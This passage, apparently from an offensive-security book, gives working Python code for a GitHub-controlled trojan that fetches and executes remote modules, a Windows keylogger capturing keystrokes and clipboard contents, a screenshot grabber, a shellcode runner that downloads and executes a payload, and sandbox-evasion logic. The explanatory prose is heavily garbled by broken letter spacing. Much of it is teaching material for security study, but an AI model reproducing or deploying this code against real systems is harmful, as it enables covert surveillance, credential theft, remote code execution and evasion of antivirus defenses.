➊ new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
➋ self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self,name):
➌ module = imp.new_module(name)
➍ exec self.current_module_code in module.__dict__
➎ sys.modules[name] = module
return module
Every ti m e th e i n te rp re te r a tte m pts to l o ad a m odule th at i s n ’t a v aila b le , o ur
GitImporter
c la ss i s
use d . T he
find_module
f u ncti o n i s c alle d f ir s t i n a n a tte m pt to l o cate th e m odule . W e p ass th is c all to
our r e m ote f ile l o ad er
➊ a nd i f w e c an l o cate th e f ile i n o ur r e p o, w e b ase 6 4-d eco de th e c o de a nd
sto re i t i n o ur c la ss
➋ . B y r e tu rn in g
self
, w e i n d ic ate to th e P yth o n i n te rp re te r th at w e f o und th e
module a nd i t c an th en c all o ur
load_module
f u ncti o n to a ctu ally l o ad i t. W e u se th e n ati v e
imp
module to f ir s t c re ate a n ew b la nk m odule o bje ct
➌ a nd th en w e s h o vel th e c o de w e r e tr ie v ed f r o m
GitH ub i n to i t
➍ . T he l a st s te p i s to i n se rt o ur n ew ly c re ate d m odule i n to th e
sys.modules
l is t
➎ s o
th at i t’ s p ic ked u p b y a ny f u tu re
import
c alls . N ow l e t’ s p ut th e f in is h in g to uches o n th e tr o ja n a nd
ta ke i t f o r a s p in .
def module_runner(module):
task_queue.put(1)
➊ result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
➋ store_module_result(result)
return
# main trojan loop
➌ sys.meta_path = [GitImporter()]
while True:

if task_queue.empty():
➍ config = get_trojan_config()
for task in config:
➎ t = threading.Thread(target=module_runner,args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
time.sleep(random.randint(1000,10000))
We f ir s t m ake s u re to a d d o ur c usto m m odule i m porte r
➌ b efo re w e b egin th e m ain l o op o f o ur
ap plic ati o n. T he f ir s t s te p i s to g ra b th e c o nfig ura ti o n f ile f r o m th e r e p o
➍ a nd th en w e k ic k o ff th e
module i n i ts o w n th re ad
➎ . W hile w e’re i n th e
module_runner
f u ncti o n, w e s im ply c all th e
module ’s
run
f u ncti o n
➊ to k ic k o ff i ts c o de. W hen i t’ s d one r u nnin g, w e s h o uld h av e th e r e su lt i n a
str in g th at w e th en p ush to o ur r e p o
➋ . T he e nd o f o ur tr o ja n w ill th en s le ep f o r a r a nd om a m ount o f
ti m e i n a n a tte m pt to f o il a ny n etw ork p atte rn a naly sis . Y ou c o uld o f c o urs e c re ate a b unch o f tr a ffic to
Google .c o m o r a ny n um ber o f o th er th in gs i n a n a tte m pt to d is g uis e w hat y o ur tr o ja n i s u p to . N ow
le t’ s ta ke i t f o r a s p in !

Kic k in g t h e T ir e s
All r ig ht! L et’ s ta ke th is th in g f o r a s p in b y r u nnin g i t f r o m th e c o m mand l in e.
WARNIN G
If y o u h ave s e n sitiv e in fo rm atio n in f ile s o r e n vir o nm en t v a ria ble s, r e m em ber th at w ith out a p riv a te r e p osito ry, th at
in fo rm atio n is g oin g to g o u p to G itH ub f o r th e w hole w orld to s e e. D on’t s a y I d id n’t w arn y o u — a nd o f c o urse y o u c a n u se
so m e e n cry p tio n te ch niq ues f ro m
Chapte r 9
.
$
python git_trojan.py
[*] Found file abc.json
[*] Attempting to retrieve dirlister
[*] Found file modules/dirlister
[*] Attempting to retrieve environment
[*] Found file modules/environment
[*] In dirlister module
[*] In environment module.
Perfe ct. I t c o nnecte d to m y r e p osito ry , r e tr ie v ed th e c o nfig ura ti o n f ile , p ulle d i n th e tw o m odule s w e
se t i n th e c o nfig ura ti o n f ile , a nd r a n th em .
Now i f y o u d ro p b ack i n to y o ur c o m mand l in e f r o m y o ur tr o ja n d ir e cto ry , e nte r:
$
git pull origin master
From https://github.com/blackhatpythonbook/chapter7
* branch master -> FETCH_HEAD
Updating f4d9c1d..5225fdf
Fast-forward
data/abc/29008.data | 1 +
data/abc/44763.data | 1 +
2 files changed, 2 insertions(+), 0 deletions(-)
create mode 100644 data/abc/29008.data
create mode 100644 data/abc/44763.data
Aw eso m e! O ur tr o ja n c hecked i n th e r e su lts o f o ur tw o r u nnin g m odule s.
There a re a n um ber o f i m pro vem ents a nd e nhancem ents th at y o u c an m ake to th is c o re c o m mand -a nd -
co ntr o l te chniq ue. E ncry p ti o n o f a ll y o ur m odule s, c o nfig ura ti o n, a nd e xfiltr a te d d ata w ould b e a g o od
sta rt. A uto m ati n g th e b ackend m anagem ent o f p ull- d ow n d ata , u p dati n g c o nfig ura ti o n f ile s, a nd r o llin g
out n ew tr o ja ns w ould a ls o b e r e q uir e d i f y o u w ere g o in g to i n fe ct o n a m assiv e s c ale . A s y o u a d d
more a nd m ore f u ncti o nality , y o u a ls o n eed to e xte nd h o w P yth o n l o ad s d ynam ic a nd c o m pile d
lib ra rie s. F or n o w , l e t’ s w ork o n c re ati n g s o m e s ta nd alo ne tr o ja n ta sk s, a nd I ’ ll l e av e i t to y o u to
in te gra te th em i n to y o ur n ew G itH ub tr o ja n.
[ 14
]
The r e po w here th is lib ra ry is h oste d is h ere :
http s://g ith ub.c o m /c o pitu x/p yth on-g ith ub3/
.
[ 15
]
You c an c heck o ut
py2exe
h ere :
http ://w ww.p y2 exe.o rg /
.
[ 16
]
An a w eso m e e xpla natio n o f th is p ro cess w rit te n b y K aro l K uczm ars k i c an b e f o und h ere :
http ://x io n.o rg .p l/2 012/0 5/0 6/h ack in g-
pyth on-im ports /
.

Chap te r 8 . C om mon T ro ja n in g T ask s o n
Win d ow s
When y o u d ep lo y a tr o ja n, y o u w ant to p erfo rm a f e w c o m mon ta sk s: g ra b k eystr o kes, ta ke
sc re ensh o ts , a nd e xecute s h ellc o de to p ro vid e a n i n te ra cti v e s e ssio n to to ols l ik e C A NVA S o r
Meta sp lo it. T his c hap te r f o cuse s o n th ese ta sk s. W e’ll w ra p th in gs u p w ith s o m e s a nd box d ete cti o n
te chniq ues to d ete rm in e i f w e a re r u nnin g w ith in a n a nti v ir u s o r f o re nsic s s a nd box. T hese m odule s
will b e e asy to m odify a nd w ill w ork w ith in o ur tr o ja n f r a m ew ork . I n l a te r c hap te rs , w e’ll e xp lo re
man-in -th e-b ro w se r-s ty le a tta cks a nd p riv ile ge e sc ala ti o n te chniq ues th at y o u c an d ep lo y w ith y o ur
tr o ja n. E ach te chniq ue c o m es w ith i ts o w n c halle nges a nd p ro bab ility o f b ein g c aught b y th e e nd u se r
or a n a nti v ir u s s o lu ti o n. I r e co m mend th at y o u c are fu lly m odel y o ur ta rg et a fte r y o u’v e i m pla nte d y o ur
tr o ja n s o th at y o u c an te st th e m odule s i n y o ur l a b b efo re tr y in g th em o n a l iv e ta rg et. L et’ s g et s ta rte d
by c re ati n g a s im ple k eylo gger.

Key lo ggin g f o r F un a n d K ey str o k es
Keylo ggin g i s o ne o f th e o ld est tr ic ks i n th e b ook a nd i s s ti ll e m plo yed w ith v ario us l e v els o f s te alth
to day. A tta ckers s ti ll u se i t b ecause i t’ s e xtr e m ely e ffe cti v e a t c ap tu rin g s e nsiti v e i n fo rm ati o n s u ch a s
cre d enti a ls o r c o nv ers a ti o ns.
An e xcelle nt P yth o n l ib ra ry n am ed P yH ook
[ 17
]
e nab le s u s to e asily tr a p a ll k eyb oard e v ents . I t ta kes
ad vanta ge o f th e n ati v e W in d ow s f u ncti o n
SetWindowsHookEx
, w hic h a llo w s y o u to i n sta ll a u se r-
defin ed f u ncti o n to b e c alle d f o r c erta in W in d ow s e v ents . B y r e gis te rin g a h o ok f o r k eyb oard e v ents ,
we a re a b le to tr a p a ll o f th e k eyp re sse s th at a ta rg et i s su es. O n to p o f th is , w e w ant to k no w e xactl y
what p ro cess th ey a re e xecuti n g th ese k eystr o kes a gain st, s o th at w e c an d ete rm in e w hen u se rn am es,
passw ord s, o r o th er ti d bits o f u se fu l i n fo rm ati o n a re e nte re d . P yH ook ta kes c are o f a ll o f th e l o w -
le v el p ro gra m min g f o r u s, w hic h l e av es th e c o re l o gic o f th e k eystr o ke l o gger u p to u s. L et’ s c ra ck
open
keylo gger.p y
a nd d ro p i n s o m e o f th e p lu m bin g:
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# get a handle to the foreground window
➊ hwnd = user32.GetForegroundWindow()
# find the process ID
pid = c_ulong(0)
➋ user32.GetWindowThreadProcessId(hwnd, byref(pid))
# store the current process ID
process_id = "%d" % pid.value
# grab the executable
executable = create_string_buffer("\x00" * 512)
➌ h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
➍ psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# now read its title
window_title = create_string_buffer("\x00" * 512)
➎ length = user32.GetWindowTextA(hwnd, byref(window_title),512)
# print out the header if we're in the right process
print
➏ print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_.
title.value)
print
# close handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
All r ig ht! S o w e j u st p ut i n s o m e h elp er v aria b le s a nd a f u ncti o n th at w ill c ap tu re th e a cti v e w in d ow
and i ts a sso cia te d p ro cess I D . W e f ir s t c all
GetForeGroundWindow
➊ , w hic h r e tu rn s a h and le to th e
acti v e w in d ow o n th e ta rg et’ s d esk to p. N ext w e p ass th at h and le to th e
GetWindowThreadProcessId

➋ f u ncti o n to r e tr ie v e th e w in d ow ’s p ro cess I D . W e th en o pen th e p ro cess
➌ a nd , u sin g th e r e su lti n g
pro cess h and le , w e f in d th e a ctu al e xecuta b le n am e
➍ o f th e p ro cess. T he f in al s te p i s to g ra b th e f u ll
te xt o f th e w in d ow ’s ti tl e b ar u sin g th e
GetWindowTextA
➎ f u ncti o n. A t th e e nd o f o ur h elp er
fu ncti o n w e o utp ut a ll o f th e i n fo rm ati o n
➏ i n a n ic e h ead er s o th at y o u c an c le arly s e e w hic h
keystr o kes w ent w ith w hic h p ro cess a nd w in d ow . N ow l e t’ s p ut th e m eat o f o ur k eystr o ke l o gger i n
pla ce to f in is h i t o ff.
def KeyStroke(event):
global current_window
# check to see if target changed windows
➊ if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# if they pressed a standard key
➋ if event.Ascii > 32 and event.Ascii < 127:
print chr(event.Ascii),
else:
# if [Ctrl-V], get the value on the clipboard
➌ if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE] - %s" % (pasted_value),
else:
print "[%s]" % event.Key,
# pass execution to next hook registered
return True
# create and register a hook manager
➍ kl = pyHook.HookManager()
➎ kl.KeyDown = KeyStroke
# register the hook and execute forever
➏ kl.HookKeyboard()
pythoncom.PumpMessages()
That’ s a ll y o u n eed ! W e d efin e o ur P yH ook
HookManager
➍ a nd th en b in d th e
KeyDown
e v ent to o ur
use r-d efin ed c allb ack f u ncti o n
KeyStroke
➎ . W e th en i n str u ct P yH ook to h o ok a ll k eyp re sse s
➏ a nd
co nti n ue e xecuti o n. W henev er th e ta rg et p re sse s a k ey o n th e k eyb oard , o ur
KeyStroke
f u ncti o n i s
calle d w ith a n e v ent o bje ct a s i ts o nly p ara m ete r. T he f ir s t th in g w e d o i s c heck i f th e u se r h as
changed w in d ow s
➊ a nd i f s o , w e a cq uir e th e n ew w in d ow ’s n am e a nd p ro cess i n fo rm ati o n. W e th en
lo ok a t th e k eystr o ke th at w as i s su ed
➋ a nd i f i t f a lls w ith in th e A SC II- p rin ta b le r a nge, w e s im ply
prin t i t o ut. I f i t’ s a m odifie r ( s u ch a s th e
SH IF T
,
CTR L
, o r
ALT
k eys) o r a ny o th er n o nsta nd ard k ey, w e
gra b th e k ey n am e f r o m th e e v ent o bje ct. W e a ls o c heck i f th e u se r i s p erfo rm in g a p aste o pera ti o n
➌ ,
and i f s o w e d um p th e c o nte nts o f th e c lip board . T he c allb ack f u ncti o n w ra p s u p b y r e tu rn in g
True
to
allo w th e n ext h o ok i n th e c hain — i f th ere i s o ne — to p ro cess th e e v ent. L et’ s ta ke i t f o r a s p in !

Kic k in g t h e T ir e s
It’ s e asy to te st o ur k eylo gger. S im ply r u n i t, a nd th en s ta rt u sin g W in d ow s n o rm ally . T ry u sin g y o ur
web b ro w se r, c alc ula to r, o r a ny o th er a p plic ati o n, a nd v ie w th e r e su lts i n y o ur te rm in al. T he o utp ut
belo w i s g o in g to l o ok a l ittl e o ff, w hic h i s o nly d ue to th e f o rm atti n g i n th e b ook.
C:\>
python keylogger-hook.py
[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -
c:\Python27\python.exe key logger-hook.py ]
t e s t
[ PID: 120 - IEXPLORE.EXE - Bing - Microsoft Internet Explorer ]
w w w . n o s t a r c h . c o m [Return]
[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -
c:\Python27\python.exe keylogger-hook.py ]
[Lwin] r
[ PID: 1944 - Explorer.EXE - Run ]
c a l c [Return]
[ PID: 2848 - calc.exe - Calculator ]
➊ [Lshift] + 1 =
You c an s e e th at I ty p ed th e w ord
te st
i n to th e m ain w in d ow w here th e k eylo gger s c rip t r a n. I th en
fir e d u p I n te rn et E xp lo re r, b ro w se d to
www.n osta rc h .c o m
, a nd r a n s o m e o th er a p plic ati o ns. W e c an
no w s a fe ly s a y th at o ur k eylo gger c an b e a d ded to o ur b ag o f tr o ja nin g tr ic ks! L et’ s m ove o n to ta kin g
sc re ensh o ts .

Tak in g S cre en sh ots
Most p ie ces o f m alw are a nd p enetr a ti o n te sti n g f r a m ew ork s i n clu d e th e c ap ab ility to ta ke s c re ensh o ts
again st th e r e m ote ta rg et. T his c an h elp c ap tu re i m ages, v id eo f r a m es, o r o th er s e nsiti v e d ata th at y o u
mig ht n o t s e e w ith a p acket c ap tu re o r k eylo gger. T hankfu lly , w e c an u se th e P yW in 3 2 p ackage ( s e e
In sta llin g th e P re re q uis ite s
) to m ake n ati v e c alls to th e W in d ow s A PI to g ra b th em .
A s c re ensh o t g ra b ber w ill u se th e W in d ow s G ra p hic s D ev ic e I n te rfa ce ( G DI) to d ete rm in e n ecessa ry
pro perti e s s u ch a s th e to ta l s c re en s iz e , a nd to g ra b th e i m age. S om e s c re ensh o t s o ftw are w ill o nly
gra b a p ic tu re o f th e c urre ntl y a cti v e w in d ow o r a p plic ati o n, b ut i n o ur c ase w e w ant th e e nti r e
sc re en. L et’ s g et s ta rte d . C ra ck o pen
sc re en sh otte r.p y
a nd d ro p i n th e f o llo w in g c o de:
import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
➊ hdesktop = win32gui.GetDesktopWindow()
# determine the size of all monitors in pixels
➋ width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# create a device context
➌ desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# create a memory based device context
➍ mem_dc = img_dc.CreateCompatibleDC()
# create a bitmap object
➎ screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# copy the screen into our memory device context
➏ mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
➐ # save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
Let’ s r e v ie w w hat th is l ittl e s c rip t d oes. F ir s t w e a cq uir e a h and le to th e e nti r e d esk to p
➊ , w hic h
in clu d es th e e nti r e v ie w ab le a re a a cro ss m ulti p le m onito rs . W e th en d ete rm in e th e s iz e o f th e
sc re en(s )
➋ s o th at w e k no w th e d im ensio ns r e q uir e d f o r th e s c re ensh o t. W e c re ate a d ev ic e
co nte xt
[ 18
]
u sin g th e
GetWindowDC
➌ f u ncti o n c all a nd p ass i n a h and le to o ur d esk to p. N ext w e n eed
to c re ate a m em ory -b ase d d ev ic e c o nte xt
➍ w here w e w ill s to re o ur i m age c ap tu re u nti l w e s to re th e
bitm ap b yte s to a f ile . W e th en c re ate a b itm ap o bje ct
➎ th at i s s e t to th e d ev ic e c o nte xt o f o ur
desk to p. T he
SelectObject
c all th en s e ts th e m em ory -b ase d d ev ic e c o nte xt to p oin t a t th e b itm ap
obje ct th at w e’re c ap tu rin g. W e u se th e
BitBlt
➏ f u ncti o n to ta ke a b it- fo r-b it c o py o f th e d esk to p
im age a nd s to re i t i n th e m em ory -b ase d c o nte xt. T hin k o f th is a s a
memcpy
c all f o r G DI o bje cts . T he
fin al s te p i s to d um p th is i m age to d is k
➐ . T his s c rip t i s e asy to te st: J u st r u n i t f r o m th e c o m mand
lin e a nd c heck th e
C:\WINDOWS\Temp
d ir e cto ry f o r y o ur
sc re en sh ot.b m p
f ile . L et’ s m ove o n to

executi n g s h ellc o de.

Pyth on ic S hellc o d e E xecu tio n
There m ig ht c o m e a ti m e w hen y o u w ant to b e a b le to i n te ra ct w ith o ne o f y o ur ta rg et m achin es, o r u se
a j u ic y n ew e xp lo it m odule f r o m y o ur f a v orite p enetr a ti o n te sti n g o r e xp lo it f r a m ew ork . T his
ty p ic ally — th o ugh n o t a lw ays — r e q uir e s s o m e f o rm o f s h ellc o de e xecuti o n. I n o rd er to e xecute r a w
sh ellc o de, w e s im ply n eed to c re ate a b uffe r i n m em ory , a nd u sin g th e
ctypes
m odule , c re ate a
fu ncti o n p oin te r to th at m em ory a nd c all th e f u ncti o n. I n o ur c ase , w e’re g o in g to u se
urllib2
to g ra b
th e s h ellc o de f r o m a w eb s e rv er i n b ase 6 4 f o rm at a nd th en e xecute i t. L et’ s g et s ta rte d ! O pen u p
sh ell_ exec.p y
a nd e nte r th e f o llo w in g c o de:
import urllib2
import ctypes
import base64
# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
➊ response = urllib2.urlopen(url)
# decode the shellcode from base64
shellcode = base64.b64decode(response.read())
# create a buffer in memory
➋ shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
# create a function pointer to our shellcode
➌ shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE
(ctypes.c_void_p))
# call our shellcode
➍ shellcode_func()
How a w eso m e i s th at? W e k ic k i t o ff b y r e tr ie v in g o ur b ase 6 4-e nco ded s h ellc o de f r o m o ur w eb
se rv er
➊ . W e th en a llo cate a b uffe r
➋ to h o ld th e s h ellc o de a fte r w e’v e d eco ded i t. T he c ty p es
cast
fu ncti o n a llo w s u s to c ast th e b uffe r to a ct l ik e a f u ncti o n p oin te r
➌ s o th at w e c an c all o ur s h ell- c o de
lik e w e w ould c all a ny n o rm al P yth o n f u ncti o n. W e f in is h i t u p b y c allin g o ur f u ncti o n p oin te r, w hic h
th en c ause s th e s h ellc o de to e xecute
➍ .

Kic k in g t h e T ir e s
You c an h and co de s o m e s h ellc o de o r u se y o ur f a v orite p ente sti n g f r a m ew ork l ik e C A NVA S o r
Meta sp lo it
[ 19
]
to g enera te i t f o r y o u. I p ic ked s o m e W in d ow s x 8 6 c allb ack s h ellc o de f o r C A NVA S i n
my c ase . S to re th e r a w s h ellc o de ( n o t th e s tr in g b uffe r!) i n
/tm p/s h ellc o de.r a w
o n y o ur L in ux m achin e
and r u n th e f o llo w in g:
justin$
base64 -i shellcode.raw > shellcode.bin
justin$
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
We s im ply b ase 6 4-e nco ded th e s h ellc o de u sin g th e s ta nd ard L in ux c o m mand l in e. T he n ext l ittl e tr ic k
use s th e
SimpleHTTPServer
m odule to tr e at y o ur c urre nt w ork in g d ir e cto ry ( in o ur c ase ,
/tm p/
) a s i ts
web r o ot. A ny r e q uests f o r f ile s w ill b e s e rv ed a uto m ati c ally f o r y o u. N ow d ro p y o ur
sh ell_ exec.p y
sc rip t i n y o ur W in d ow s V M a nd e xecute i t. Y ou s h o uld s e e th e f o llo w in g i n y o ur L in ux te rm in al:
192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200 -
This i n d ic ate s th at y o ur s c rip t h as r e tr ie v ed th e s h ellc o de f r o m th e s im ple w eb s e rv er th at y o u s e t u p
usin g th e
SimpleHTTPServer
m odule . I f a ll g o es w ell, y o u’ll r e ceiv e a s h ell b ack to y o ur f r a m ew ork ,
and h av e p opped
ca lc .e xe
, o r d is p la yed a m essa ge b ox o r w hate v er y o ur s h ellc o de w as c o m pile d f o r.

San dbox D ete ctio n
In cre asin gly , a nti v ir u s s o lu ti o ns e m plo y s o m e f o rm o f s a nd boxin g to d ete rm in e th e b ehav io r o f
su sp ic io us s p ecim ens. W heth er th is s a nd box r u ns o n th e n etw ork p erim ete r, w hic h i s b eco m in g m ore
popula r, o r o n th e ta rg et m achin e i ts e lf, w e m ust d o o ur b est to a v oid ti p pin g o ur h and to a ny d efe nse
in p la ce o n th e ta rg et’ s n etw ork . W e c an u se a f e w i n d ic ato rs to tr y to d ete rm in e w heth er o ur tr o ja n i s
executi n g w ith in a s a nd box. W e’ll m onito r o ur ta rg et m achin e f o r r e cent u se r i n p ut, i n clu d in g
keystr o kes a nd m ouse -c lic ks.
Then w e’ll a d d s o m e b asic i n te llig ence to l o ok f o r k eystr o kes, m ouse -c lic ks, a nd d oub le -c lic ks. O ur
sc rip t w ill a ls o tr y to d ete rm in e i f th e s a nd box o pera to r i s s e nd in g i n p ut r e p eate d ly ( i.e ., a s u sp ic io us
ra p id s u ccessio n o f c o nti n uo us m ouse -c lic ks) i n o rd er to tr y to r e sp ond to r u d im enta ry s a nd box
dete cti o n m eth o ds. W e’ll c o m pare th e l a st ti m e a u se r i n te ra cte d w ith th e m achin e v ers u s h o w l o ng
th e m achin e h as b een r u nnin g, w hic h s h o uld g iv e u s a g o od i d ea w heth er w e a re i n sid e a s a nd box o r
no t. A ty p ic al m achin e h as m any i n te ra cti o ns a t s o m e p oin t d urin g a d ay s in ce i t h as b een b oote d ,
where as a s a nd box e nv ir o nm ent u su ally h as n o u se r i n te ra cti o n b ecause s a nd boxes a re ty p ic ally u se d
as a n a uto m ate d m alw are a naly sis te chniq ue.
We c an th en m ake a d ete rm in ati o n a s to w heth er w e w ould l ik e to c o nti n ue e xecuti n g o r n o t. L et’ s
sta rt w ork in g o n s o m e s a nd box d ete cti o n c o de. O pen
sa ndbox_ dete ct.p y
a nd th ro w i n th e f o llo w in g
co de:
import ctypes
import random
import time
import sys
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
keystrokes = 0
mouse_clicks = 0
double_clicks = 0
These a re th e m ain v aria b le s w here w e a re g o in g to tr a ck th e to ta l n um ber o f m ouse -c lic ks, d oub le -
clic ks, a nd k eystr o kes. L ate r, w e’ll l o ok a t th e ti m in g o f th e m ouse e v ents a s w ell. N ow l e t’ s c re ate
and te st s o m e c o de
fo r d ete cti n g h o w l o ng th e s y ste m h as b een r u nnin g a nd h o w l o ng s in ce th e l a st
use r i n p ut. A dd th e f o llo w in g f u ncti o n to y o ur
sa ndbox_ dete ct.p y
s c rip t:
class LASTINPUTINFO(ctypes.Structure):
_fields_ = [("cbSize", ctypes.c_uint),
("dwTime", ctypes.c_ulong)
]
def get_last_input():
struct_lastinputinfo = LASTINPUTINFO()
➊ struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)
# get last input registered
➋ user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))
# now determine how long the machine has been running
➌ run_time = kernel32.GetTickCount()
elapsed = run_time - struct_lastinputinfo.dwTime
print "[*] It's been %d milliseconds since the last input event." %
elapsed

return elapsed
# TEST CODE REMOVE AFTER THIS PARAGRAPH!
➍ while True:
get_last_input()
time.sleep(1)
We d efin e a
LASTINPUTINFO
s tr u ctu re th at w ill h o ld th e ti m esta m p ( in m illis e co nd s) o f w hen th e l a st
in p ut e v ent w as d ete cte d o n th e s y ste m . D o n o te th at y o u h av e to i n iti a liz e th e
cbSize
➊ v aria b le to
th e s iz e o f th e s tr u ctu re b efo re m akin g th e c all. W e th en c all th e
GetLastInputInfo
➋ f u ncti o n,
whic h p opula te s o ur
struct_lastinputinfo.dwTime
f ie ld w ith th e ti m esta m p. T he n ext s te p i s to
dete rm in e h o w l o ng th e s y ste m h as b een r u nnin g b y u sin g th e
GetTickCount
➌ f u ncti o n c all. T he l a st
littl e s n ip pet o f c o de
➍ i s s im ple te st c o de w here y o u c an r u n th e s c rip t a nd th en m ove th e m ouse , o r
hit a k ey o n th e k eyb oard a nd s e e th is n ew p ie ce o f c o de i n a cti o n.
We’ll d efin e th re sh o ld s f o r th ese u se r i n p ut v alu es n ext. B ut f ir s t i t’ s w orth n o ti n g th at th e to ta l
ru nnin g s y ste m ti m e a nd th e l a st d ete cte d u se r i n p ut e v ent c an a ls o b e r e le v ant to y o ur p arti c ula r
meth o d o f i m pla nta ti o n. F or e xam ple , i f y o u k no w th at y o u’re o nly i m pla nti n g u sin g a p his h in g ta cti c ,
th en i t’ s l ik ely th at a u se r h ad to c lic k o r p erfo rm s o m e o pera ti o n to g et i n fe cte d . T his m eans th at
with in th e l a st m in ute o r tw o, y o u w ould s e e u se r i n p ut. I f f o r s o m e r e aso n y o u s e e th at th e m achin e
has b een r u nnin g f o r 1 0 m in ute s a nd th e l a st d ete cte d i n p ut w as 1 0 m in ute s a go , th en y o u a re l ik ely
in sid e a s a nd box th at h as n o t p ro cesse d a ny u se r i n p ut. T hese j u d gm ent c alls a re a ll p art o f h av in g a
go od tr o ja n th at w ork s c o nsis te ntl y .
This s a m e te chniq ue c an b e u se fu l f o r p ollin g th e s y ste m to s e e i f a u se r i s i d le o r n o t, a s y o u m ay
only w ant to s ta rt ta kin g s c re ensh o ts w hen th ey a re a cti v ely u sin g th e m achin e, a nd l ik ew is e , y o u m ay
only w ant to tr a nsm it d ata o r p erfo rm o th er ta sk s w hen th e u se r a p pears to b e o fflin e. Y ou c o uld a ls o ,
fo r e xam ple , m odel a u se r o ver ti m e to d ete rm in e w hat d ays a nd h o urs th ey a re ty p ic ally o nlin e.
Let’ s d ele te th e l a st th re e l in es o f te st c o de, a nd a d d s o m e a d diti o nal c o de to l o ok a t k eystr o kes a nd
mouse -c lic ks. W e’ll u se a p ure
ctypes
s o lu ti o n th is ti m e a s o ppose d to th e P yH ook m eth o d. Y ou c an
easily u se P yH ook f o r th is p urp ose a s w ell, b ut h av in g a c o up le o f d iffe re nt tr ic ks i n y o ur to olb ox
alw ays h elp s a s e ach a nti v ir u s a nd s a nd boxin g te chno lo gy h as i ts o w n w ays o f s p otti n g th ese tr ic ks.
Let’ s g et c o din g:
def get_key_press():
global mouse_clicks
global keystrokes
➊ for i in range(0,0xff):
➋ if user32.GetAsyncKeyState(i) == -32767:
# 0x1 is the code for a left mouse-click
➌ if i == 0x1:
mouse_clicks += 1
return time.time()
➍ elif i > 32 and i < 127:
keystrokes += 1
return None
This s im ple f u ncti o n te lls u s th e n um ber o f m ouse -c lic ks, th e ti m e o f th e m ouse -c lic ks, a s w ell a s h o w
many k eystr o kes th e ta rg et h as i s su ed . T his w ork s b y i te ra ti n g o ver th e r a nge o f v alid i n p ut k eys
➊ ;
fo r e ach k ey, w e c heck w heth er th e k ey h as b een p re sse d u sin g th e
GetAsyncKeyState
➋ f u ncti o n
call. I f th e k ey i s d ete cte d a s b ein g p re sse d , w e c heck i f i t i s
0x1
➌ , w hic h i s th e v ir tu al k ey c o de f o r

a l e ft m ouse -b utto n c lic k. W e i n cre m ent th e to ta l n um ber o f m ouse -c lic ks a nd r e tu rn th e c urre nt
ti m esta m p s o th at w e c an p erfo rm ti m in g c alc ula ti o ns l a te r o n. W e a ls o c heck i f th ere a re A SC II
keyp re sse s o n th e k eyb oard
➍ a nd i f s o , w e s im ply i n cre m ent th e to ta l n um ber o f k eystr o kes
dete cte d . N ow l e t’ s c o m bin e th e r e su lts o f th ese f u ncti o ns i n to o ur p rim ary s a nd box d ete cti o n l o op.
Add th e f o llo w in g c o de to
sa ndbox_ dete ct.p y
:
def detect_sandbox():
global mouse_clicks
global keystrokes
➊ max_keystrokes = random.randint(10,25)
max_mouse_clicks = random.randint(5,25)
double_clicks = 0
max_double_clicks = 10
double_click_threshold = 0.250 # in seconds
first_double_click = None
average_mousetime = 0
max_input_threshold = 30000 # in milliseconds
previous_timestamp = None
detection_complete = False
➋ last_input = get_last_input()
# if we hit our threshold let's bail out
if last_input >= max_input_threshold:
sys.exit(0)
while not detection_complete:
➌ keypress_time = get_key_press()
if keypress_time is not None and previous_timestamp is not None:
# calculate the time between double clicks
➍ elapsed = keypress_time - previous_timestamp
# the user double clicked
➎ if elapsed <= double_click_threshold:
double_clicks += 1
if first_double_click is None:
# grab the timestamp of the first double click
first_double_click = time.time()
else:
➏ if double_clicks == max_double_clicks:
➐ if keypress_time - first_double_click <= .
(max_double_clicks * double_click_threshold):
sys.exit(0)
# we are happy there's enough user input
➑ if keystrokes >= max_keystrokes and double_clicks >= max_.
double_clicks and mouse_clicks >= max_mouse_clicks:
return
previous_timestamp = keypress_time
elif keypress_time is not None:
previous_timestamp = keypress_time

detect_sandbox()
print "We are ok!"
All r ig ht. B e m in d fu l o f th e i n d enta ti o n i n th e c o de b lo cks a b ove! W e s ta rt b y d efin in g s o m e v aria b le s
➊ to tr a ck th e ti m in g o f m ouse -c lic ks, a nd s o m e th re sh o ld s w ith r e gard to h o w m any k eystr o kes o r
